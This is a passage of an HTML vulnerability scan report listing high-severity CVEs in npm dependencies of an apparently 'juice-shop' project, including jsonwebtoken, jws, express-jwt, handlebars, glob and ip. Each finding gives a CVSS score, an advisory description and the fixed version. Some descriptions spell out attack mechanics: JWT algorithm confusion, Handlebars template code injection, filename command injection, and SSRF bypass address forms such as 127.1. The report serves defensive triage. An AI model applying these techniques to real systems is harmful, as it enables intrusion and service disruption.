https://access.redhat.com/security/cve/CVE-2026-28390
+https://github.com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc
+https://github.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6
+https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5cebbaff4
+https://github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788
+https://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7ee75
+https://nvd.nist.gov/vuln/detail/CVE-2026-28390
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://ubuntu.com/security/notices/USN-8155-2
+https://www.cve.org/CVERecord?id=CVE-2026-28390
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 69: NSWG-ECO-428 Base64url 0.0.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
base64url0.0.6
+ + + + + + + +
File Path
juice-shop/node_modules/base64url/package.json
+
+
+
+ + + + + +
Description
+

Out-of-bounds Read
+Target: Node.js
+Type: node-pkg
+Fixed version: >=3.0.0

+

base64url allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below

+ + +
Mitigation
+
+

=3.0.0

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/brianloveswords/base64url/pull/25
+https://hackerone.com/reports/321687

+ + + + + + + +
+
+
+
+ Finding 83: CVE-2024-4068 Braces 2.3.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1050 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
braces2.3.2
+ + + + + + + +
File Path
juice-shop/node_modules/braces/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

braces: fails to limit the number of characters it can handle
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.0.3

+

The NPM package braces, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js, + if a malicious user sends "imbalanced braces" as input, the parsing +will enter a loop, which will cause the program to start allocating heap + memory without freeing it at any moment of the loop. Eventually, the +JavaScript heap limit is reached, and the program will crash.

+ + +
Mitigation
+

3.0.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-4068
+https://devhub.checkmarx.com/cve-details/CVE-2024-4068
+https://devhub.checkmarx.com/cve-details/CVE-2024-4068/
+https://github.com/micromatch/braces
+https://github.com/micromatch/braces/blob/98414f9f1fabe021736e26836d8306d5de747e0d/lib/parse.js#L308
+https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff
+https://github.com/micromatch/braces/issues/35
+https://github.com/micromatch/braces/pull/37
+https://github.com/micromatch/braces/pull/40
+https://nvd.nist.gov/vuln/detail/CVE-2024-4068
+https://www.cve.org/CVERecord?id=CVE-2024-4068

+ + + + + + + +
+
+
+
+ Finding 89: CVE-2020-15084 Express-JWT 0.1.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 285 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
express-jwt0.1.3
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N

+ + +
Description
+

Authorization bypass in express-jwt
+Target: Node.js
+Type: node-pkg
+Fixed version: 6.0.0

+

In express-jwt (NPM package) up and including version 5.3.3, the +algorithms entry to be specified in the configuration is not being +enforced. When algorithms is not specified in the configuration, with +the combination of jwks-rsa, it may lead to authorization bypass. You +are affected by this vulnerability if all of the following conditions +apply: - You are using express-jwt - You do not have algorithms configured in your express-jwt configuration. - You are using libraries such as jwks-rsa as the secret. You can fix this by specifying algorithms in the express-jwt configuration. See linked GHSA for example. This is also fixed in version 6.0.0.

+ + +
Mitigation
+

6.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/auth0/express-jwt/commit/7ecab5f8f0cab5297c2b863596566eb0c019cdef
+https://github.com/auth0/express-jwt/security/advisories/GHSA-6g6m-m6h5-w9gf
+https://nvd.nist.gov/vuln/detail/CVE-2020-15084

+ + + + + + + +
+
+
+
+ Finding 91: CVE-2025-64756 Glob 10.4.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 78 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
glob10.4.5
+ + + + + + + +
File Path
juice-shop/node_modules/glob/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

glob: glob: Command Injection Vulnerability via Malicious Filenames
+Target: Node.js
+Type: node-pkg
+Fixed version: 11.1.0, 10.5.0

+

Glob matches files using patterns the shell uses. Starting in version + 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a + command injection vulnerability in its -c/--cmd option that allows +arbitrary command execution when processing files with malicious names. +When glob -c <command> <patterns> are used, matched +filenames are passed to a shell with shell: true, enabling shell +metacharacters in filenames to trigger command injection and achieve +arbitrary code execution under the user or CI account privileges. This +issue has been patched in versions 10.5.0 and 11.1.0.

+ + +
Mitigation
+

11.1.0, 10.5.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-64756
+https://github.com/isaacs/node-glob
+https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f
+https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146
+https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2
+https://nvd.nist.gov/vuln/detail/CVE-2025-64756
+https://www.cve.org/CVERecord?id=CVE-2025-64756

+ + + + + + + +
+
+
+
+ Finding 94: CVE-2026-33938 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

handlebars: Handlebars: Arbitrary code execution via @partial-block overwrite
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the @partial-block + special variable is stored in the template data context and is +reachable and mutable from within a template via helpers that accept +arbitrary objects. When a helper overwrites @partial-block with a crafted Handlebars AST, a subsequent invocation of {{> @partial-block}} + compiles and executes that AST, enabling arbitrary JavaScript execution + on the server. Version 4.7.9 fixes the issue. Some workarounds are +available. First, use the runtime-only build (require('handlebars/runtime')). The compile() + method is absent, eliminating the vulnerable fallback path. Second, +audit registered helpers for any that write arbitrary values to context +objects. Helpers should treat context data as read-only. Third, avoid +registering helpers from third-party packages (such as handlebars-helpers) in contexts where templates or context data can be influenced by untrusted input.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33938
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r
+https://nvd.nist.gov/vuln/detail/CVE-2026-33938
+https://www.cve.org/CVERecord?id=CVE-2026-33938

+ + + + + + + +
+
+
+
+ Finding 95: CVE-2026-33939 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 754 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

handlebars.js: Handlebars.js: Denial of Service via malformed decorator syntax in template compilation
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic +templates. In versions 4.0.0 through 4.7.8, when a Handlebars template +contains decorator syntax referencing an unregistered decorator (e.g. {{*n}}), the compiled template calls lookupProperty(decorators, "n"), which returns undefined. The runtime then immediately invokes the result as a function, causing an unhandled TypeError: ... is not a function that crashes the Node.js process. Any application that compiles user-supplied templates without wrapping the call in a try/catch + is vulnerable to a single-request Denial of Service. Version 4.7.9 +fixes the issue. Some workarounds are available. Wrap compilation and +rendering in try/catch. Validate template input before passing it to compile(); reject templates containing decorator syntax ({{*...}}) + if decorators are not used in your application. Use the pre-compilation + workflow; compile templates at build time and serve only pre-compiled +templates; do not call compile() at request time.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33939
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff
+https://nvd.nist.gov/vuln/detail/CVE-2026-33939
+https://www.cve.org/CVERecord?id=CVE-2026-33939

+ + + + + + + +
+
+
+
+ Finding 96: CVE-2026-33940 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

handlebars.js: Handlebars.js: Arbitrary code execution via crafted template context
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic +templates. In versions 4.0.0 through 4.7.8, a crafted object placed in +the template context can bypass all conditional guards in resolvePartial() and cause invokePartial() to return undefined. + The Handlebars runtime then treats the unresolved partial as a source +that needs to be compiled, passing the crafted object to env.compile(). + Because the object is a valid Handlebars AST containing injected code, +the generated JavaScript executes arbitrary commands on the server. The +attack requires the adversary to control a value that can be returned by + a dynamic partial lookup. Version 4.7.9 fixes the issue. Some +workarounds are available. First, use the runtime-only build (require('handlebars/runtime')). Without compile(), the fallback compilation path in invokePartial + is unreachable. Second, sanitize context data before rendering: Ensure +no value in the context is a non-primitive object that could be passed +to a dynamic partial. Third, avoid dynamic partial lookups ({{> (lookup ...)}}) when context data is user-controlled.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33940
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6
+https://nvd.nist.gov/vuln/detail/CVE-2026-33940
+https://www.cve.org/CVERecord?id=CVE-2026-33940

+ + + + + + + +
+
+
+
+ Finding 97: CVE-2026-33941 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

+ + +
Description
+

handlebars.js: Handlebars: Arbitrary code execution via CLI precompiler input sanitization flaw
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic +templates. In versions 4.0.0 through 4.7.8, the Handlebars CLI +precompiler (bin/handlebars / lib/precompiler.js) + concatenates user-controlled strings — template file names and several +CLI options — directly into the JavaScript it emits, without any +escaping or sanitization. An attacker who can influence template +filenames or CLI arguments can inject arbitrary JavaScript that executes + when the generated bundle is loaded in Node.js or a browser. Version +4.7.9 fixes the issue. Some workarounds are available. First, validate +all CLI inputs before invoking the precompiler. Reject filenames and +option values that contain characters with JavaScript string-escaping +significance (", ', ;, etc.). +Second, use a fixed, trusted namespace string passed via a configuration + file rather than command-line arguments in automated pipelines. Third, + run the precompiler in a sandboxed environment (container with no write + access to sensitive paths) to limit the impact of successful +exploitation. Fourth, audit template filenames in any repository or +package that is consumed by an automated build pipeline.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33941
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf
+https://nvd.nist.gov/vuln/detail/CVE-2026-33941
+https://www.cve.org/CVERecord?id=CVE-2026-33941

+ + + + + + + +
+
+
+
+ Finding 101: CVE-2022-25881 HTTP-Cache-Semantics 3.8.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
http-cache-semantics3.8.1
+ + + + + + + +
File Path
juice-shop/node_modules/http-cache-semantics/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.1.1

+

This affects versions of the package http-cache-semantics before +4.1.1. The issue can be exploited via malicious request header values +sent to a server, when that server reads the cache policy from the +request using this library.

+ + +
Mitigation
+

4.1.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2023:2655
+https://access.redhat.com/security/cve/CVE-2022-25881
+https://bugzilla.redhat.com/2165824
+https://bugzilla.redhat.com/2168631
+https://bugzilla.redhat.com/2171935
+https://bugzilla.redhat.com/2172190
+https://bugzilla.redhat.com/2172204
+https://bugzilla.redhat.com/2172217
+https://bugzilla.redhat.com/show_bug.cgi?id=2165824
+https://bugzilla.redhat.com/show_bug.cgi?id=2168631
+https://bugzilla.redhat.com/show_bug.cgi?id=2171935
+https://bugzilla.redhat.com/show_bug.cgi?id=2172190
+https://bugzilla.redhat.com/show_bug.cgi?id=2172204
+https://bugzilla.redhat.com/show_bug.cgi?id=2172217
+https://bugzilla.redhat.com/show_bug.cgi?id=2178076
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25881
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4904
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23918
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23920
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23936
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24807
+https://errata.almalinux.org/9/ALSA-2023-2655.html
+https://errata.rockylinux.org/RLSA-2023:2655
+https://github.com/kornelski/http-cache-semantics
+https://github.com/kornelski/http-cache-semantics/blob/master/index.js%23L83
+https://github.com/kornelski/http-cache-semantics/commit/560b2d8ef452bbba20ffed69dc155d63ac757b74
+https://linux.oracle.com/cve/CVE-2022-25881.html
+https://linux.oracle.com/errata/ELSA-2023-2655.html
+https://nvd.nist.gov/vuln/detail/CVE-2022-25881
+https://security.netapp.com/advisory/ntap-20230622-0008
+https://security.netapp.com/advisory/ntap-20230622-0008/
+https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3253332
+https://security.snyk.io/vuln/SNYK-JS-HTTPCACHESEMANTICS-3248783
+https://www.cve.org/CVERecord?id=CVE-2022-25881

+ + + + + + + +
+
+
+
+ Finding 102: CVE-2024-29415 Ip 2.0.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 918 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
ip2.0.1
+ + + + + + + +
File Path
juice-shop/node_modules/ip/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

node-ip: Incomplete fix for CVE-2023-42282
+Target: Node.js
+Type: node-pkg
+Fixed version:

+

The ip package through 2.0.1 for Node.js might allow SSRF because +some IP addresses (such as 127.1, 01200034567, 012.1.2.3, +000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as +globally routable via isPublic. NOTE: this issue exists because of an +incomplete fix for CVE-2023-42282.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-29415
+https://cosmosofcyberspace.github.io/npm_ip_cve/npm_ip_cve.html
+https://github.com/indutny/node-ip
+https://github.com/indutny/node-ip/issues/150
+https://github.com/indutny/node-ip/pull/143
+https://github.com/indutny/node-ip/pull/144
+https://nvd.nist.gov/vuln/detail/CVE-2024-29415
+https://security.netapp.com/advisory/ntap-20250117-0010
+https://security.netapp.com/advisory/ntap-20250117-0010/
+https://www.cve.org/CVERecord?id=CVE-2024-29415

+ + + + + + + +
+
+
+
+ Finding 106: CVE-2022-23539 Jsonwebtoken 0.1.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 327 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.1.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

+ + +
Description
+

jsonwebtoken: Unrestricted key type could lead to legacy keys usagen
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

Versions <=8.5.1 of jsonwebtoken library + could be misconfigured so that legacy, insecure key types are used for +signature verification. For example, DSA keys could be used with the +RS256 algorithm. You are affected if you are using an algorithm and a +key type other than a combination listed in the GitHub Security Advisory + as unaffected. This issue has been fixed, please update to version +9.0.0. This version validates for asymmetric key type and algorithm +combinations. Please refer to the above mentioned algorithm / key type +combinations for the valid secure configuration. After updating to +version 9.0.0, if you still intend to continue with signing or verifying + tokens using invalid key type/algorithm value combinations, you’ll need + to set the allowInvalidAsymmetricKeyTypes option to true in the sign() and/or verify() functions.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23539
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33
+https://nvd.nist.gov/vuln/detail/CVE-2022-23539
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23539

+ + + + + + + +
+
+
+
+ Finding 107: NSWG-ECO-17 Jsonwebtoken 0.1.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.1.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + + +
Description
+

Verification Bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: >=4.2.2

+

It is possible for an attacker to bypass verification when "a token +digitally signed with an asymetric key (RS/ES family) of algorithms but +instead the attacker send a token digitally signed with a symmetric +algorithm (HS* family)" [1]

+ + +
Mitigation
+
+

=4.2.2

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687
+https://www.timmclean.net/2015/02/25/jwt-alg-none.html

+ + + + + + + +
+
+
+
+ Finding 111: CVE-2022-23539 Jsonwebtoken 0.4.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 327 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.4.0
+ + + + + + + +
File Path
juice-shop/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

+ + +
Description
+

jsonwebtoken: Unrestricted key type could lead to legacy keys usagen
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

Versions <=8.5.1 of jsonwebtoken library + could be misconfigured so that legacy, insecure key types are used for +signature verification. For example, DSA keys could be used with the +RS256 algorithm. You are affected if you are using an algorithm and a +key type other than a combination listed in the GitHub Security Advisory + as unaffected. This issue has been fixed, please update to version +9.0.0. This version validates for asymmetric key type and algorithm +combinations. Please refer to the above mentioned algorithm / key type +combinations for the valid secure configuration. After updating to +version 9.0.0, if you still intend to continue with signing or verifying + tokens using invalid key type/algorithm value combinations, you’ll need + to set the allowInvalidAsymmetricKeyTypes option to true in the sign() and/or verify() functions.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23539
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33
+https://nvd.nist.gov/vuln/detail/CVE-2022-23539
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23539

+ + + + + + + +
+
+
+
+ Finding 112: NSWG-ECO-17 Jsonwebtoken 0.4.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.4.0
+ + + + + + + +
File Path
juice-shop/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + + +
Description
+

Verification Bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: >=4.2.2

+

It is possible for an attacker to bypass verification when "a token +digitally signed with an asymetric key (RS/ES family) of algorithms but +instead the attacker send a token digitally signed with a symmetric +algorithm (HS* family)" [1]

+ + +
Mitigation
+
+

=4.2.2

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687
+https://www.timmclean.net/2015/02/25/jwt-alg-none.html

+ + + + + + + +
+
+
+
+ Finding 115: CVE-2016-1000223 JWS 0.2.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jws0.2.6
+ + + + + + + +
File Path
juice-shop/node_modules/jws/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

+ + +
Description
+

Forgeable Public/Private Tokens
+Target: Node.js
+Type: node-pkg
+Fixed version: >=3.0.0

+

Since "algorithm" isn't enforced in jws.verify(), a +malicious user could choose what algorithm is sent to the server. If the + server is expecting RSA but is sent HMAC-SHA with RSA's public key, the + server will think the public key is actually an HMAC private key. This +could be used to forge any data an attacker wants.

+

In addition, there is the none algorithm to be concerned about. In versions prior to 3.0.0, verification of the token could be bypassed when the alg field is set to none.

+

Edit ( 7/29/16 ): A previous version of this advisory incorrectly + stated that the vulnerability was patched in version 2.0.0 instead of +3.0.0. The advisory has been updated to reflect this new information. +Thanks to Fabien Catteau for reporting the error.

+ + +
Mitigation
+
+

=3.0.0

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+https://github.com/brianloveswords/node-jws
+https://github.com/brianloveswords/node-jws/ +commit/585d0e1e97b6747c10cf5b7689ccc5618a89b299#diff-4ac32a78649ca5bdd8e0ba38b7006a1e
+https://nvd.nist.gov/vuln/detail/CVE-2016-1000223
+https://snyk.io/vuln/npm:jws:20160726
+https://www.npmjs.com/advisories/88

+ + + + + + + +
+
+
+
+ Finding 116: CVE-2025-65945 JWS 0.2.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
